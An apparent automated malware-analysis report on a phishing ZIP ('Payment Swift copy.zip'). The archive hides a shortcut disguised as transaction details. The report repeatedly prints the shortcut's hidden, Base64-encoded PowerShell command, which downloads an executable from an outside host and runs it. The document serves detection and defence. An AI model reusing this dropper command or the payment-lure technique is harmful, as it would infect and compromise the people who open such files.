Malicious
Malicious

Payment Swift copy.zip

ZIP Archive
|
MD5: d1f009e2fd65b43f2eb917a772fbb8d6
|
Size: 2.54 KB
|
application/zip

Zip Archive
LNK
Malicious
LOLBin
LOLBin:powershell.exe
Execution: CMD in LNK
T1059.003
T1202: Indirect Command Execution
T1204.002
Execution: PowerShell in LNK
T1059.001
PowerShell
Batch Command
PowerShell Call
DeObfuscated
Infection Chain
Summary by MalvaGPT
Characteristics
Hash
 Hash Value
MD5
d1f009e2fd65b43f2eb917a772fbb8d6
Sha1
bcdc298cdd7eba27cfad2f824860f94faadf9e24
Sha256
329ae4035bda94f3994dfc78d2bd771647e05cde4fe091ed076cea12f5831b81
Sha384
1f7f2fc25d5af3e7417aa70b4ebe7cd097e04ecfe85a4a131516c3e13cdd249727e268ee345e223cf6cb3e763b927f9e
Sha512
158a273d4278dc03e4f48dd570ccc3cf462f03b0370d3f6d05445472f1c75b690d74291357efbab5c1e9bb8ac7c124b017c71c89c2902150853a10699e9c1c56
SSDeep
48:9iywvVA1zu7+TuSS8kWZTaWnywvVA1zu7+TuSS8kWZTaWU:YZvVA1K7+TuSSETaeZvVA1K7+TuSSET8
TLSH
B351D7A0740F6D74ED8AA7BE6088E8A92C4560CC6E65FF18A0C1EE55695634807B835A
File Structure
Payment Swift copy.zip
Zip Archive
LNK
Malicious
LOLBin
LOLBin:powershell.exe
Execution: CMD in LNK
T1059.003
T1202: Indirect Command Execution
T1204.002
Execution: PowerShell in LNK
T1059.001
PowerShell
Batch Command
PowerShell Call
DeObfuscated
Malicious
Details of Transaction.lnk
Archive Entry
LNK
Malicious
LOLBin
LOLBin:powershell.exe
Execution: CMD in LNK
T1059.003
T1202: Indirect Command Execution
T1204.002
Execution: PowerShell in LNK
T1059.001
PowerShell
Batch Command
PowerShell Call
DeObfuscated
Malicious
LNK CommandLine
PowerShell
Batch Command
PowerShell Call
DeObfuscated
Contains Base64 Block
Base64 Block
Powershell: Hidden Execution
Malicious
[Deobfuscated PS]
DeObfuscated
PowerShell
Contains Base64 Block
Base64 Block
Malicious
[Base64-Block]
Base64 Block
[PowerShell Command]
PowerShell
DeObfuscated
Contains Base64 Block
Base64 Block
Malicious
[Deobfuscated PS]
DeObfuscated
PowerShell
Contains Base64 Block
Base64 Block
Malicious
[Lnk Summary]
PowerShell
Contains Base64 Block
Base64 Block
DeObfuscated
Malicious
[PowerShell Command]
PowerShell
Contains Base64 Block
Base64 Block
Malicious
[Deobfuscated PS]
DeObfuscated
PowerShell
Contains Base64 Block
Base64 Block
Malicious
[Deobfuscated PS]
DeObfuscated
PowerShell
Contains Base64 Block
Base64 Block
Malicious
Artefacts
Name
 Value
LNK: Command Execution

powershell.exe -NonInteractive -WindowStyle Hidden -NoProfile invoke-expression([System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('JHBhdGggPSAkZW52OlRFTVAgKyAnXEFueSBOYW1lLmV4ZSc7IChOZXctT2JqZWN0IFN5c3RlbS5OZXQuV2ViQ2xpZW50KS5Eb3dubG9hZEZpbGUoJ2h0dHA6Ly9oYXZhamVsLmNvbS93cC1pbmNsdWRlcy9TaW1wbGVQaWUvc3JjL3dnMGtOOTcuZXhlJywgJHBhdGgpOyBzdGFydCAkcGF0aDs=')));
Deobfuscated PowerShell

-noninteractive -WindowStyle "Hidden" -NoProfile "invoke-expression" ([Encoding]::"UTF8"."GetString"([Convert]::"FromBase64String"("JHBhdGggPSAkZW52OlRFTVAgKyAnXEFueSBOYW1lLmV4ZSc7IChOZXctT2JqZWN0IFN5c3RlbS5OZXQuV2ViQ2xpZW50KS5Eb3dubG9hZEZpbGUoJ2h0dHA6Ly9oYXZhamVsLmNvbS93cC1pbmNsdWRlcy9TaW1wbGVQaWUvc3JjL3dnMGtOOTcuZXhlJywgJHBhdGgpOyBzdGFydCAkcGF0aDs=")))
Deobfuscated PowerShell

-noninteractive -WindowStyle "Hidden" -NoProfile "invoke-expression" ([Encoding]::"UTF8"."GetString"([Convert]::"FromBase64String"("JHBhdGggPSAkZW52OlRFTVAgKyAnXEFueSBOYW1lLmV4ZSc7IChOZXctT2JqZWN0IFN5c3RlbS5OZXQuV2ViQ2xpZW50KS5Eb3dubG9hZEZpbGUoJ2h0dHA6Ly9oYXZhamVsLmNvbS93cC1pbmNsdWRlcy9TaW1wbGVQaWUvc3JjL3dnMGtOOTcuZXhlJywgJHBhdGgpOyBzdGFydCAkcGF0aDs=")))
Deobfuscated PowerShell

Invoke-Expression ([Encoding]::"UTF8"."GetString"([Convert]::"FromBase64String"("JHBhdGggPSAkZW52OlRFTVAgKyAnXEFueSBOYW1lLmV4ZSc7IChOZXctT2JqZWN0IFN5c3RlbS5OZXQuV2ViQ2xpZW50KS5Eb3dubG9hZEZpbGUoJ2h0dHA6Ly9oYXZhamVsLmNvbS93cC1pbmNsdWRlcy9TaW1wbGVQaWUvc3JjL3dnMGtOOTcuZXhlJywgJHBhdGgpOyBzdGFydCAkcGF0aDs=")))
Deobfuscated PowerShell

Invoke-Expression ([Encoding]::"UTF8"."GetString"([Convert]::"FromBase64String"("JHBhdGggPSAkZW52OlRFTVAgKyAnXEFueSBOYW1lLmV4ZSc7IChOZXctT2JqZWN0IFN5c3RlbS5OZXQuV2ViQ2xpZW50KS5Eb3dubG9hZEZpbGUoJ2h0dHA6Ly9oYXZhamVsLmNvbS93cC1pbmNsdWRlcy9TaW1wbGVQaWUvc3JjL3dnMGtOOTcuZXhlJywgJHBhdGgpOyBzdGFydCAkcGF0aDs=")))
Payment Swift copy.zip (2.54 KB)
File Structure
Payment Swift copy.zip
Zip Archive
LNK
Malicious
LOLBin
LOLBin:powershell.exe
Execution: CMD in LNK
T1059.003
T1202: Indirect Command Execution
T1204.002
Execution: PowerShell in LNK
T1059.001
PowerShell
Batch Command
PowerShell Call
DeObfuscated
Malicious
Details of Transaction.lnk
Archive Entry
LNK
Malicious
LOLBin
LOLBin:powershell.exe
Execution: CMD in LNK
T1059.003
T1202: Indirect Command Execution
T1204.002
Execution: PowerShell in LNK
T1059.001
PowerShell
Batch Command
PowerShell Call
DeObfuscated
Malicious
LNK CommandLine
PowerShell
Batch Command
PowerShell Call
DeObfuscated
Contains Base64 Block
Base64 Block
Powershell: Hidden Execution
Malicious
[Deobfuscated PS]
DeObfuscated
PowerShell
Contains Base64 Block
Base64 Block
Malicious
[Base64-Block]
Base64 Block
[PowerShell Command]
PowerShell
DeObfuscated
Contains Base64 Block
Base64 Block
Malicious
[Deobfuscated PS]
DeObfuscated
PowerShell
Contains Base64 Block
Base64 Block
Malicious
[Lnk Summary]
PowerShell
Contains Base64 Block
Base64 Block
DeObfuscated
Malicious
[PowerShell Command]
PowerShell
Contains Base64 Block
Base64 Block
Malicious
[Deobfuscated PS]
DeObfuscated
PowerShell
Contains Base64 Block
Base64 Block
Malicious
[Deobfuscated PS]
DeObfuscated
PowerShell
Contains Base64 Block
Base64 Block
Malicious
Characteristics
No malware configuration were found at this point.
Artefacts
Name
 Value Location
LNK: Command Execution

powershell.exe -NonInteractive -WindowStyle Hidden -NoProfile invoke-expression([System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('JHBhdGggPSAkZW52OlRFTVAgKyAnXEFueSBOYW1lLmV4ZSc7IChOZXctT2JqZWN0IFN5c3RlbS5OZXQuV2ViQ2xpZW50KS5Eb3dubG9hZEZpbGUoJ2h0dHA6Ly9oYXZhamVsLmNvbS93cC1pbmNsdWRlcy9TaW1wbGVQaWUvc3JjL3dnMGtOOTcuZXhlJywgJHBhdGgpOyBzdGFydCAkcGF0aDs=')));

Malicious

Payment Swift copy.zip > Details of Transaction.lnk
Deobfuscated PowerShell

-noninteractive -WindowStyle "Hidden" -NoProfile "invoke-expression" ([Encoding]::"UTF8"."GetString"([Convert]::"FromBase64String"("JHBhdGggPSAkZW52OlRFTVAgKyAnXEFueSBOYW1lLmV4ZSc7IChOZXctT2JqZWN0IFN5c3RlbS5OZXQuV2ViQ2xpZW50KS5Eb3dubG9hZEZpbGUoJ2h0dHA6Ly9oYXZhamVsLmNvbS93cC1pbmNsdWRlcy9TaW1wbGVQaWUvc3JjL3dnMGtOOTcuZXhlJywgJHBhdGgpOyBzdGFydCAkcGF0aDs=")))

Malicious

Payment Swift copy.zip > Details of Transaction.lnk > LNK CommandLine
Deobfuscated PowerShell

-noninteractive -WindowStyle "Hidden" -NoProfile "invoke-expression" ([Encoding]::"UTF8"."GetString"([Convert]::"FromBase64String"("JHBhdGggPSAkZW52OlRFTVAgKyAnXEFueSBOYW1lLmV4ZSc7IChOZXctT2JqZWN0IFN5c3RlbS5OZXQuV2ViQ2xpZW50KS5Eb3dubG9hZEZpbGUoJ2h0dHA6Ly9oYXZhamVsLmNvbS93cC1pbmNsdWRlcy9TaW1wbGVQaWUvc3JjL3dnMGtOOTcuZXhlJywgJHBhdGgpOyBzdGFydCAkcGF0aDs=")))

Malicious

Payment Swift copy.zip > Details of Transaction.lnk > LNK CommandLine > [Deobfuscated PS]
Deobfuscated PowerShell

Invoke-Expression ([Encoding]::"UTF8"."GetString"([Convert]::"FromBase64String"("JHBhdGggPSAkZW52OlRFTVAgKyAnXEFueSBOYW1lLmV4ZSc7IChOZXctT2JqZWN0IFN5c3RlbS5OZXQuV2ViQ2xpZW50KS5Eb3dubG9hZEZpbGUoJ2h0dHA6Ly9oYXZhamVsLmNvbS93cC1pbmNsdWRlcy9TaW1wbGVQaWUvc3JjL3dnMGtOOTcuZXhlJywgJHBhdGgpOyBzdGFydCAkcGF0aDs=")))

Malicious

Payment Swift copy.zip > Details of Transaction.lnk > LNK CommandLine > [PowerShell Command]
Deobfuscated PowerShell

Invoke-Expression ([Encoding]::"UTF8"."GetString"([Convert]::"FromBase64String"("JHBhdGggPSAkZW52OlRFTVAgKyAnXEFueSBOYW1lLmV4ZSc7IChOZXctT2JqZWN0IFN5c3RlbS5OZXQuV2ViQ2xpZW50KS5Eb3dubG9hZEZpbGUoJ2h0dHA6Ly9oYXZhamVsLmNvbS93cC1pbmNsdWRlcy9TaW1wbGVQaWUvc3JjL3dnMGtOOTcuZXhlJywgJHBhdGgpOyBzdGFydCAkcGF0aDs=")))

Malicious

Payment Swift copy.zip > Details of Transaction.lnk > LNK CommandLine > [PowerShell Command] > [Deobfuscated PS]
You must be signed in to post a comment.
An error has occurred. This application may no longer respond until reloaded. Reload 🗙